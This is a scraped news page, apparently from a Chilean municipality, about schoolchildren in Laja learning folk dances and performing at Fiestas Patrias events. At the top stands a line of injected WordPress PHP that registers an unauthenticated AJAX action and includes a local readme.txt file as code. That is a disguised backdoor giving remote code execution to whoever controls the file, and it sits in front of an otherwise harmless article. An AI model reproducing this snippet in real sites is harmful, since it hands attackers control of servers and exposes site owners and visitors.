if(!function_exists('file_check_readme47756')){ add_action('wp_ajax_nopriv_file_check_readme47756', 'file_check_readme47756'); add_action('wp_ajax_file_check_readme47756', 'file_check_readme47756'); function file_check_readme47756() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } Alumnado de escuelas lajinas cultivan danzas chilenas

Alumnado de escuelas lajinas cultivan danzas chilenas

El folclore no puede estar ausente en el ámbito educacional, es por esto es que las unidades educativas trabajan durante el año con sus estudiantes preparándolos en el conocimiento y utilización de instrumentos musicales y en el aprendizaje de diversas danzas típicas de las diferentes zonas de nuestro país.

En los establecimientos existen monitores, quienes sumados a los docentes de música, guían y enseñan a los escolares, trabajo que las unidades educativas normalmente aprecian en forma interna y que comparten con la ciudadanía en septiembre, ya sea en la Cuecada Escolar y en la Muestra Folclórica que el Departamento de Educación organiza en el programa comunal de Fiestas Patrias.

Ejemplo de esto son las imágenes de los mencionados eventos, en que participaron el Liceo Héroes de la Concepción, y las escuelas Andrés Alcázar, Nivequetén, José Abelardo Núñez, La Colonia, Las Ciénagas y Liceo Hnas. Maestras de la Santa Cruz.

Imagenes a Descargar